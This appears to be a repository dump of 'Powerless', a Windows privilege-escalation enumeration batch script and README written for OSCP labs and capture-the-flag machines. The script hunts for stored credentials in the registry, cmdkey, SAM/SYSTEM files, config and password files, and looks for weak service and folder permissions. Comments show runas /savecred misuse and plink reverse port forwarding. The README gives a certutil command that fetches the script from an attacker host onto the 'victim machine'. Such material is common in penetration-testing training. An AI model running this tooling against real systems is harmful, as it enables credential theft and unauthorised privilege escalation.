├── Powerless.bat └── README.md /Powerless.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | set userprofile=%cd% 3 | mode con:cols=160 lines=9999 4 | Cd c:\ 5 | 6 | echo ------ System Info (Use full output in conjunction with windows-exploit-suggester.py)------- 7 | :: https://github.com/GDSSecurity/Windows-Exploit-Suggester 8 | systeminfo 9 | echo. 10 | 11 | echo ----- Architecture ------- 12 | SET Processor 13 | echo. 14 | 15 | echo ------ Users and groups (check individual user with 'net user USERNAME' ) Check user privileges for SeImpersonate (rotten potato exploit) ------- 16 | :: Note, in CTF boxes its not uncommon to see other low level users on the machine. It can be a temptation to want to always skip to Administrator, but sometimes it is essential that you elevate privileges to that of a different user first before being able to get admin rights. Once you get that users rights, pay close attention to their user folder. 17 | echo Current User: %username% 18 | whoami /all 19 | echo --- All users, accounts and groups --- 20 | net users 21 | net accounts 22 | net localgroup 23 | 24 | echo ------- Administrators -------- 25 | net localgroup administrators 26 | 27 | echo ------- Environment Variables ------- 28 | set 29 | echo. 30 | 31 | echo ------- Additional Drives (if not run as part of a batch job replace double percent with single percent sign)-------- 32 | for %%i in (a b d e f g h i j k l m n o p q r s t u v w x y z) do @dir %%i: 2>nul 33 | echo. 34 | 35 | echo ---------------------------------------- Search for Quick Wins -------------------------------------- 36 | echo -------- Listing contents of user directories --------- 37 | :: In CTF machines it is VERY common for there to be artifacts used for privilege escalation within user directories. Pay special attention for files that may contain credentials, or files that maybe used as part of a scheduled task. You can typically ignore most default windows files (some of which have been filtered out as part of this script). 38 | dir "C:\Users\" /a /b /s 2>nul | findstr /v /i "Favorites\\" | findstr /v /i "AppData\\" | findstr /v /i "Microsoft\\" | findstr /v /i "Application Data\\" 39 | dir "C:\Documents and Settings\" /a /b /s 2>nul | findstr /v /i "Favorites\\" | findstr /v /i "AppData\\" | findstr /v /i "Microsoft\\" | findstr /v /i "Application Data\\" 40 | echo. 41 | 42 | echo -------- Exploring program directories and C:\ --------- 43 | :: These directory listings are not recursive. They are meant to give you a general overview of the programs installed on the system. Searchsploit every (non default/windows) program version, and check each program config for creds. 44 | echo --- Program Files --- 45 | dir "C:\Program Files" /b 46 | echo --- Program Files (x86) --- 47 | dir "C:\Program Files (x86)" /b 48 | echo --- Root of C:\ ---- 49 | dir "C:\" /b 50 | echo. 51 | 52 | echo --- Inetpub (any config files in here? May need to manually drill into this folder if it exists) --- 53 | :: The root web folder can at times be extensive, and thus we do not always want to show a recursive listing of its contents in this script but it should always be investigated regardless. 54 | dir /a /b C:\inetpub\ 55 | 56 | echo --- Broad search for Apache or Xampp --- 57 | dir /s /b apache* xampp* 58 | echo. 59 | 60 | echo ---Search for Configuration and sensitive files--- 61 | echo -- Broad search for config files -- 62 | :: If the .NET framework is installed you will get a bunch of config files which are typically default and can be ignored. The more you practice priv esc. the more youll learn which files can be ignored, and which you should give a closer eye to. 63 | dir /s /b php.ini httpd.conf httpd-xampp.conf my.ini my.cnf web.config 64 | echo -- Application Host File -- 65 | type C:\Windows\System32\inetsrv\config\applicationHost.config 2>nul 66 | echo -- Broad search for unattend or sysprep files -- 67 | dir /b /s unattended.xml* sysprep.xml* sysprep.inf* unattend.xml* 68 | echo -- Stored Passwords -- 69 | :: To use stored cmdkey credentials use runas with /savecred flag (e.g. runas /savecred /user:ACCESS\Administrator "ping 10.10.10.9") 70 | cmdkey /list 71 | echo. 72 | 73 | echo -- Checking for any accessible SAM or SYSTEM files -- 74 | dir %SYSTEMROOT%\repair\SAM 2>nul 75 | dir %SYSTEMROOT%\System32\config\RegBack\SAM 2>nul 76 | dir %SYSTEMROOT%\System32\config\SAM 2>nul 77 | dir %SYSTEMROOT%\repair\system 2>nul 78 | dir %SYSTEMROOT%\System32\config\SYSTEM 2>nul 79 | dir %SYSTEMROOT%\System32\config\RegBack\system 2>nul 80 | dir /a /b /s SAM.b* 81 | echo. 82 | 83 | echo -- Broad search for vnc kdbx or rdp files -- 84 | dir /a /s /b *.kdbx *vnc.ini *.rdp 85 | echo. 86 | 87 | echo --- Searching Registry for Passwords --- 88 | reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" 89 | reg query HKLM /f password /t REG_SZ /s /k 90 | reg query HKCU /f password /t REG_SZ /s /k 91 | reg query "HKCU\Software\ORL\WinVNC3\Password" 92 | reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" 93 | reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" 94 | echo. 95 | 96 | echo --- AlwaysInstallElevated Check --- 97 | reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated 98 | reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated 99 | echo. 100 | 101 | echo --- Program Files and User Directories where everybody (or users) have full or modify permissions --- 102 | where /q icacls 103 | IF ERRORLEVEL 1 ( 104 | echo icacls is missing, performing checks using cacls for older versions of Windows 105 | FOR /F "tokens=* USEBACKQ" %%F IN (`where cacls`) DO (SET cacls_exe=%%F) 106 | ) ELSE ( 107 | FOR /F "tokens=* USEBACKQ" %%F IN (`where icacls`) DO (SET cacls_exe=%%F) 108 | ) 109 | %cacls_exe% "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone" 110 | %cacls_exe% "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone" 111 | %cacls_exe% "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users" 112 | %cacls_exe% "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users" 113 | %cacls_exe% "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone" 114 | %cacls_exe% "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone" 115 | %cacls_exe% "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users" 116 | %cacls_exe% "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users" 117 | %cacls_exe% "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "Everyone" 118 | %cacls_exe% "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "Everyone" 119 | %cacls_exe% "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users" 120 | %cacls_exe% "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users" 121 | %cacls_exe% "C:\Users\*" 2>nul | findstr "(F)" | findstr "Everyone" 122 | %cacls_exe% "C:\Users\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users" 123 | %cacls_exe% "C:\Users\*" 2>nul | findstr "(M)" | findstr "Everyone" 124 | %cacls_exe% "C:\Users\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users" 125 | %cacls_exe% "C:\Documents and Settings\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users" 126 | %cacls_exe% "C:\Users\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users" 127 | echo. 128 | 129 | echo ---Domain joined? If so check domain controller for GPP files ---- 130 | set user 131 | echo. 132 | 133 | cd %userprofile% 134 | echo ---Unquoted Service Paths (requires that the directory from which this script is run is user writeable. If it is not, you can use the WMIC command below) --- 135 | REM wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """ 136 | sc query state= all > scoutput.txt 137 | findstr "SERVICE_NAME:" scoutput.txt > Servicenames.txt 138 | FOR /F "tokens=2 delims= " %%i in (Servicenames.txt) DO @echo %%i >> services.txt 139 | FOR /F %%i in (services.txt) DO @sc qc %%i | findstr "BINARY_PATH_NAME" >> path.txt 140 | find /v """" path.txt > unquotedpaths.txt 141 | sort unquotedpaths.txt|findstr /i /v C:\WINDOWS 142 | del /f Servicenames.txt 143 | del /f services.txt 144 | del /f path.txt 145 | del /f scoutput.txt 146 | del /f unquotedpaths.txt 147 | echo. 148 | 149 | echo --------------- AccessChk (checks permissions for Authenticated Users, Everyone, and Users)------------------ 150 | reg.exe ADD "HKCU\Software\Sysinternals\AccessChk" /v EulaAccepted /t REG_DWORD /d 1 /f 151 | 152 | echo --- Accesschk World writeable folders and files ---- 153 | accesschk.exe -uwdqs "Users" c:\ /accepteula 154 | accesschk.exe -uwdqs "Authenticated Users" c:\ /accepteula 155 | accesschk.exe -qwsu "Everyone" * /accepteula 156 | accesschk.exe -qwsu "Authenticated Users" * /accepteula 157 | accesschk.exe -qwsu "Users" * /accepteula 158 | echo. 159 | echo --- Accesschk services with weak permissions --- 160 | accesschk.exe -uwcqv "Authenticated Users" * /accepteula 161 | accesschk.exe -uwcqv "Everyone" * /accepteula 162 | accesschk.exe -uwcqv "Users" * /accepteula 163 | echo. 164 | echo --- Accesschk services that we can change registry values for (such as ImagePath) --- 165 | accesschk.exe -kvqwsu "Everyone" hklm\system\currentcontrolset\services /accepteula 166 | accesschk.exe -kvqwsu "Authenticated Users" hklm\system\currentcontrolset\services /accepteula 167 | accesschk.exe -kvqwsu "Users" hklm\system\currentcontrolset\services /accepteula 168 | echo. 169 | echo ---------------------------------------- End Search for Quick Wins -------------------------------------- 170 | 171 | cd c:\ 172 | echo ------- Powershell existence/version check ------- 173 | REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion 174 | 175 | echo ------- Network shares ------- 176 | net share 177 | 178 | echo ------- Programs that run at startup ------ 179 | :: Note on some legacy Windows editions WMIC may fail to install/start/freeze in which case you'll need to comment out any calls to wmic 180 | wmic startup get caption,command 181 | 182 | echo -------- Path (is dll hijacking possible?) ------ 183 | echo Getting system + user path from command line (check permissions using cacls [path] or accesschk.exe -dqv [path])... 184 | echo %path% 185 | echo. 186 | :: I couldnt find a way to only get system path in DOS (user path does not matter for the purpose of dll hijacking). If powershell is available you can use folderperm.ps1 script 187 | :: https://github.com/ankh2054/windows-pentest/blob/master/Powershell/folderperms.ps1 188 | :: powershell.exe -ExecutionPolicy Bypass -noLogo -Command "[Environment]::GetEnvironmentVariable('Path', [System.EnvironmentVariableTarget]::Machine)" 189 | :: Or let the script do all the work for you 190 | :: powershell.exe -executionpolicy bypass -file folderperm.ps1 191 | 192 | echo ------- Scheduled Tasks Names Only ------- 193 | :: Look for any interesting/non-standard scheduled tasks, then view the scheduled task details list below to get a better idea of what that task is doing and who is running it). 194 | schtasks /query /fo LIST 2>nul | findstr "TaskName" 195 | echo. 196 | 197 | echo ------- Scheduled Tasks Details (taskname, author, command run, run as user) ------- 198 | schtasks /query /fo LIST /v | findstr "TaskName Author: Run: User:" 199 | echo. 200 | 201 | echo ------- Services Currently Running (check for Windows Defender or Anti-virus) --------- 202 | net start 203 | echo. 204 | 205 | echo ------- Link Running Processes to started services -------- 206 | tasklist /SVC 207 | echo. 208 | 209 | echo ------- Processes verbose output (who is running what?) -------- 210 | :: Pay close attention to this list. Especially for those tasks run by a user other than your own. 211 | tasklist /v 212 | echo. 213 | 214 | echo ------- Patches (also listed as part of systeminfo) ------- 215 | :: Note on some legacy Windows editions WMIC may fail to install/start/freeze in which case you'll need to comment out any calls to wmic 216 | :: Systeminfo may at times fail to list all patches (instead showing 'file x' or something along those lines) in which case its important to have this fallback. 217 | wmic qfe get Caption,Description,HotFixID,InstalledOn 218 | 219 | echo ------- Firewall ------ 220 | netsh firewall show state 221 | netsh firewall show config 222 | netsh advfirewall firewall dump 223 | 224 | echo ------ Network information ------ 225 | ipconfig /all 226 | 227 | :: Routing and ARP tables accessible with these commands... uncomment if you wish, I didnt typically find them helpful for priv esc. 228 | REM route print 229 | REM arp -A 230 | echo. 231 | 232 | echo ------- Current connections and listening ports ------- 233 | :: Reverse port forward anything that is not accessible remotely, and run nmap on it. If SMB is available locally, do you have creds or hashes you can pass through it after port forwarding? 234 | netstat -ano 235 | echo. 236 | echo ------- REVERSE PORT FORWARD MULTIPLE PORTS AT ONCE: plink.exe -l username -pw mysecretpassword -P [port] 10.11.0.108 -R 8080:127.0.0.1:8080 -R 8000:127.0.0.1:8000 -R 443:127.0.0.1:443 ------------ 237 | echo. 238 | 239 | echo --- Broad search for any possible config files which may contain passwords --- 240 | :: The following broad config file and credential searches could result in many results. They are meant as a fall back once you have already done thorough enumeration of user directories, web directories, and program directories (in addition to having pillaged the db). 241 | dir /s /b *pass* *cred* *vnc* *.config* 242 | echo. 243 | 244 | echo --- Starting broad search in the background for any files with the word password in it. Press enter to get status occasionally --" 245 | start /b findstr /sim password *.xml *.ini *.txt *.config *.bak 2>nul 246 | echo. 247 | 248 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Powerless 2 | A Windows privilege escalation (enumeration) script designed with OSCP labs (i.e. legacy Windows machines without Powershell) in mind. The script represents a conglomeration of various privilege escalation checks, gathered from various sources, all done via native Windows binaries present in almost every version of Windows. 3 | 4 | Note, the batch file also operates on the latest versions of Windows as well. PowerShell is not necessary to achieve proper OS enumeration. 5 | 6 | # Use 7 | Copy the batch file from your attacker machine to a user writeable directory on the victim machine (typically the current users folder, or the "public" user folder will be writeable). 8 | 9 | Also (although the script will run without it), it recommened you copy (an older verison of) AccessChk.exe to the same location. It is recommended you use an older version of AccessChk.exe as the latest verison will not work on some older Windows machines. The archived version here worked well in my experience (thanks, g0tmi1k); https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe 10 | 11 | There are many ways to copy over files. I found certutil.exe to be the most reliable across Windows editions. For example; 12 | 13 | certutil.exe -urlcache -split -f "http://$IP/Powerless.bat" Powerless.bat 14 | 15 | The script may generate a lot of output. My recommended approach is to go through it sequentially making a list of 'interesting' things to look at, sorting them as you go. Once you've reached the end of the output, go through your list in order of what stuck out the most. 16 | 17 | You will do yourself a great disservice if you lean heavily on kernel exploits at the expense of thorough Windows enumeration. Although you may find kernel exploits often in work in the labs, try to find other avenues as well. The script has comments sprinkled throughout to try to provide guidance on what to look for. 18 | 19 | # Recommended OSCP-like Windows Hack The Box machines 20 | Regretably, the vast majority of HTB Windows machines require kernel exploits for privilege escalation. I found the following machines helpful for practicing priv esc (read, not your typical privilege escalation). 21 | 22 | - Chatterbox 23 | - Jeeves 24 | - Access 25 | - Active 26 | - SecNotes 27 | 28 | # Sources 29 | - http://www.fuzzysecurity.com/tutorials/16.html 30 | - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md 31 | - https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html 32 | - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ 33 | - https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ 34 | --------------------------------------------------------------------------------